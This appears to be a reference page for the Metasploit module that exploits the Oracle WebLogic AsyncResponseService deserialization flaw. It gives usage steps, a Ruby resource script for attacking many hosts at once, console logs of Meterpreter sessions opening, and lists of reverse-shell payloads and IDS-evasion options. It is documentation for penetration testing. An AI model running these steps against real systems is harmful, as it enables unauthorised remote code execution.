Oracle Weblogic Server Deserialization RCE - AsyncResponseService - Metasploit


This page contains detailed information about how to use the exploit/multi/misc/weblogic_deserialize_asyncresponseservice metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Oracle Weblogic Server Deserialization RCE - AsyncResponseService
Module: exploit/multi/misc/weblogic_deserialize_asyncresponseservice
Source code: modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
Disclosure date: 2019-04-23
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): Solaris, Unix, Windows
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 7001, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2017-10271, CVE-2019-2725

An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a malicious SOAP request to the interface WLS AsyncResponseService to execute code on the vulnerable host.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using weblogic_deserialize_asyncresponseservice against a single host

Normally, you can use exploit/multi/misc/weblogic_deserialize_asyncresponseservice this way:

msf > use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
msf exploit(weblogic_deserialize_asyncresponseservice) > show targets
    ... a list of targets ...
msf exploit(weblogic_deserialize_asyncresponseservice) > set TARGET target-id
msf exploit(weblogic_deserialize_asyncresponseservice) > show options
    ... show and set options ...
msf exploit(weblogic_deserialize_asyncresponseservice) > exploit

Using weblogic_deserialize_asyncresponseservice against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your weblogic_deserialize_asyncresponseservice will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/misc/weblogic_deserialize_asyncresponseservice")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


CVE-2017-10271 exploits an XML deserialization vulnerability in Oracle WebLogic via the AsyncResponseService component. The exploit provides an unauthenticated attacker with remote arbitrary command execution.

Oracle Weblogic runs as a Java-based service in Windows, Linux, and Unix environments. It is downloadable from Oracle once registered for an account. For testing vulnerable environments, we used Weblogic 10.3.6 for Ubuntu (wls1036_linux32.bin), Weblogic 10.3.6 for Windows (wls1036_dev.zip). For testing a non-vulnerable environment, we used Weblogic 12.2.1.2 (fmw_12.2.1.2.0_wls.jar) in combination with a JDK (jdk-8u211-windows-x64.exe).

Verification Steps


Install the application

  1. Install the application using the binaries above, with both a WebLogic server and an admin server.
  2. When prompted, name the project base_domain.
  3. When prompted, use a development environment instead of a production environment.
  4. When prompted, keep the default port of TCP/7001.
  5. When prompted, provide a username and password, and make a note of them.
  6. Upon completion of the installer, find and execute the admin server. On Windows: C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\startWebLogic.cmd. On Linux: ~/Oracle/Middleware/user_projects/base_domain/bin/startWebLogic.sh
  7. You may be prompted for the username and password you generated during the install process.
  8. Wait for the output: <Server state changed to RUNNING.>

Checking for the vulnerability

  1. Start msfconsole
  2. use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
  3. Configure RHOSTS to the target address, and set RPORT if the default port is not being used.
  4. Run the check method to confirm exploitability.
  5. Look for the following output:
msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > check
[+] 172.16.135.128:8088 - The target is vulnerable.

Exploiting the vulnerability

  1. Follow the steps in the previous "checking" section.
  2. Set the operating system of the target (eg. set TARGET Windows)
  3. Configure the payload and payload parameters.
  4. run

Options


TARGETURI : Set this to the AsyncResponseService uri, normally it should be /_async/asyncresponseservice. You can also set VHOST instead to handle virtual hosts.

Scenarios


msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > exploit

[*] Started reverse TCP handler on 172.16.135.1:4444 
[*] Generating payload...
[*] Sending payload...
[*] Sending stage (179779 bytes) to 172.16.135.128
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.128:49266) at 2019-05-22 14:16:03 -0500

meterpreter >

Go back to menu.

Msfconsole Usage


Here is how the multi/misc/weblogic_deserialize_asyncresponseservice exploit module looks in the msfconsole:

msf6 > use exploit/multi/misc/weblogic_deserialize_asyncresponseservice

[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > show info

       Name: Oracle Weblogic Server Deserialization RCE - AsyncResponseService 
     Module: exploit/multi/misc/weblogic_deserialize_asyncresponseservice
   Platform: Unix, Windows, Solaris
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2019-04-23

Provided by:
  Andres Rodriguez - 2Secure (@acamro) <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Unix
  1   Windows
  2   Solaris

Check supported:
  Yes

Basic options:
  Name       Current Setting               Required  Description
  ----       ---------------               --------  -----------
  Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      7001                          yes       The target port (TCP)
  SSL        false                         no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /_async/AsyncResponseService  yes       URL to AsyncResponseService
  VHOST                                    no        HTTP server virtual host

Payload information:

Description:
  An unauthenticated attacker with network access to the Oracle 
  Weblogic Server T3 interface can send a malicious SOAP request to 
  the interface WLS AsyncResponseService to execute code on the 
  vulnerable host.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2017-10271
  CNVD-C (2019-48814)
  http://www.cnvd.org.cn/webinfo/show/4999
  https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html
  https://twitter.com/F5Labs/status/1120822404568244224

Module Options


This is a complete list of options available in the multi/misc/weblogic_deserialize_asyncresponseservice exploit:

msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > show options

Module options (exploit/multi/misc/weblogic_deserialize_asyncresponseservice):

   Name       Current Setting               Required  Description
   ----       ---------------               --------  -----------
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      7001                          yes       The target port (TCP)
   SSL        false                         no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /_async/AsyncResponseService  yes       URL to AsyncResponseService
   VHOST                                    no        HTTP server virtual host

Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Unix

Advanced Options


Here is a complete list of advanced options supported by the multi/misc/weblogic_deserialize_asyncresponseservice exploit:

msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > show advanced

Module advanced options (exploit/multi/misc/weblogic_deserialize_asyncresponseservice):

   Name                                    Current Setting                                     Required  Description
   ----                                    ---------------                                     --------  -----------
   ContextInformationFile                                                                      no        The information file that contains context information
   DOMAIN                                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS                           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler                   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding                   false                                               no        Use transient context when encoding payloads
   FingerprintCheck                        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace                               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors                         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly                    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                                no        The HTTP username to specify for authentication
   Powershell::encode_final_payload        false                                               yes       Encode final payload for -EncodedCommand
   Powershell::encode_inner_payload        false                                               yes       Encode inner payload for -EncodedCommand
   Powershell::exec_in_place               false                                               yes       Produce PSH without executable wrapper
   Powershell::exec_rc4                    false                                               yes       Encrypt PSH with RC4
   Powershell::method                      reflection                                          yes       Payload delivery method (Accepted: net, reflection, old, msil)
   Powershell::no_equals                   false                                               yes       Pad base64 until no "=" remains
   Powershell::noninteractive              true                                                yes       Execute powershell without interaction
   Powershell::persist                     false                                               yes       Run the payload in a loop
   Powershell::prepend_protections_bypass  true                                                yes       Prepend AMSI/SBL bypass
   Powershell::prepend_sleep                                                                   no        Prepend seconds of sleep
   Powershell::remove_comspec              false                                               yes       Produce script calling powershell directly
   Powershell::strip_comments              true                                                yes       Strip comments
   Powershell::strip_whitespace            false                                               yes       Strip whitespace
   Powershell::sub_funcs                   false                                               yes       Substitute function names
   Powershell::sub_vars                    true                                                yes       Substitute variable names
   Powershell::wrap_double_quotes          true                                                yes       Wraps the -Command argument in single quotes
   SSLVersion                              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2
                                                                                                         )
   UserAgent                               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                                   no        Specify the workspace for this module
   WfsDelay                                12                                                  no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/reverse_bash):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/misc/weblogic_deserialize_asyncresponseservice module can exploit:

msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Unix
   1   Windows
   2   Solaris

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/misc/weblogic_deserialize_asyncresponseservice exploit:

msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
   1   payload/cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   2   payload/cmd/unix/bind_jjs                                    normal  No     Unix Command Shell, Bind TCP (via jjs)
   3   payload/cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)
   4   payload/cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)
   5   payload/cmd/unix/bind_netcat_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   6   payload/cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   7   payload/cmd/unix/bind_nodejs                                 normal  No     Unix Command Shell, Bind TCP (via nodejs)
   8   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   9   payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   10  payload/cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)
   11  payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   12  payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   13  payload/cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)
   14  payload/cmd/unix/bind_stub                                   normal  No     Unix Command Shell, Bind TCP (stub)
   15  payload/cmd/unix/bind_zsh                                    normal  No     Unix Command Shell, Bind TCP (via Zsh)
   16  payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   17  payload/cmd/unix/pingback_bind                               normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   18  payload/cmd/unix/pingback_reverse                            normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   19  payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   20  payload/cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)
   21  payload/cmd/unix/reverse_bash                                normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   22  payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   23  payload/cmd/unix/reverse_bash_udp                            normal  No     Unix Command Shell, Reverse UDP (/dev/udp)
   24  payload/cmd/unix/reverse_jjs                                 normal  No     Unix Command Shell, Reverse TCP (via jjs)
   25  payload/cmd/unix/reverse_ksh                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   26  payload/cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)
   27  payload/cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)
   28  payload/cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)
   29  payload/cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   30  payload/cmd/unix/reverse_nodejs                              normal  No     Unix Command Shell, Reverse TCP (via nodejs)
   31  payload/cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   32  payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   33  payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   34  payload/cmd/unix/reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   35  payload/cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
   36  payload/cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   37  payload/cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)
   38  payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   39  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   40  payload/cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)
   41  payload/cmd/unix/reverse_ssh                                 normal  No     Unix Command Shell, Reverse TCP SSH
   42  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   43  payload/cmd/unix/reverse_stub                                normal  No     Unix Command Shell, Reverse TCP (stub)
   44  payload/cmd/unix/reverse_tclsh                               normal  No     Unix Command Shell, Reverse TCP (via Tclsh)
   45  payload/cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)
   46  payload/generic/custom                                       normal  No     Custom Payload
   47  payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   48  payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the multi/misc/weblogic_deserialize_asyncresponseservice exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

The target returned a vulnerable HTTP error: /<VALUE>


Here is a relevant code snippet related to the "The target returned a vulnerable HTTP error: /<VALUE>" error message:

82:	      'headers'  => {'SOAPAction' => '' }
83:	    )
84:	
85:	    if res && res.code == 500 && res.body.include?("<faultcode>env:Client</faultcode>")
86:	      vprint_status("The target returned a vulnerable HTTP code: /#{res.code}")
87:	      vprint_status("The target returned a vulnerable HTTP error: /#{res.body.split("\n")[0]}")
88:	      Exploit::CheckCode::Vulnerable
89:	    elsif res && res.code != 202
90:	      vprint_status("The target returned a non-vulnerable HTTP code")
91:	      Exploit::CheckCode::Safe
92:	    elsif res.nil?

The target did not respond in an expected way


Here is a relevant code snippet related to the "The target did not respond in an expected way" error message:

88:	      Exploit::CheckCode::Vulnerable
89:	    elsif res && res.code != 202
90:	      vprint_status("The target returned a non-vulnerable HTTP code")
91:	      Exploit::CheckCode::Safe
92:	    elsif res.nil?
93:	      vprint_status("The target did not respond in an expected way")
94:	      Exploit::CheckCode::Unknown
95:	    else
96:	      vprint_status("The target returned HTTP code: #{res.code}")
97:	      vprint_status("The target returned HTTP body: #{res.body.split("\n")[0]} [...]")
98:	      Exploit::CheckCode::Unknown

The target forcibly closed the connection, and is likely not vulnerable.


Here is a relevant code snippet related to the "The target forcibly closed the connection, and is likely not vulnerable." error message:

153:	        'ctype'    => 'text/xml',
154:	        'data'     => soap_payload,
155:	        'headers'  => {'SOAPAction' => '' }
156:	      )
157:	    rescue Errno::ENOTCONN
158:	      fail_with(Failure::Disconnected, "The target forcibly closed the connection, and is likely not vulnerable.")
159:	    end
160:	
161:	    if res.nil?
162:	      fail_with(Failure::Unreachable, "No response from host")
163:	    elsif res && res.code != 202

No response from host


Here is a relevant code snippet related to the "No response from host" error message:

157:	    rescue Errno::ENOTCONN
158:	      fail_with(Failure::Disconnected, "The target forcibly closed the connection, and is likely not vulnerable.")
159:	    end
160:	
161:	    if res.nil?
162:	      fail_with(Failure::Unreachable, "No response from host")
163:	    elsif res && res.code != 202
164:	      fail_with(Failure::UnexpectedReply,"Exploit failed.  Host did not responded with HTTP code #{res.code} instead of HTTP code 202")
165:	    end
166:	  end
167:	end

Exploit failed. Host did not responded with HTTP code <RES.CODE> instead of HTTP code 202


Here is a relevant code snippet related to the "Exploit failed. Host did not responded with HTTP code <RES.CODE> instead of HTTP code 202" error message:

157:	    rescue Errno::ENOTCONN
158:	      fail_with(Failure::Disconnected, "The target forcibly closed the connection, and is likely not vulnerable.")
159:	    end
160:	
161:	    if res.nil?
162:	      fail_with(Failure::Unreachable, "No response from host")
163:	    elsif res && res.code != 202
164:	      fail_with(Failure::UnexpectedReply,"Exploit failed.  Host did not responded with HTTP code #{res.code} instead of HTTP code 202")
165:	    end
166:	  end
167:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>

Version


This page has been produced using Metasploit Framework version 6.1.28-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.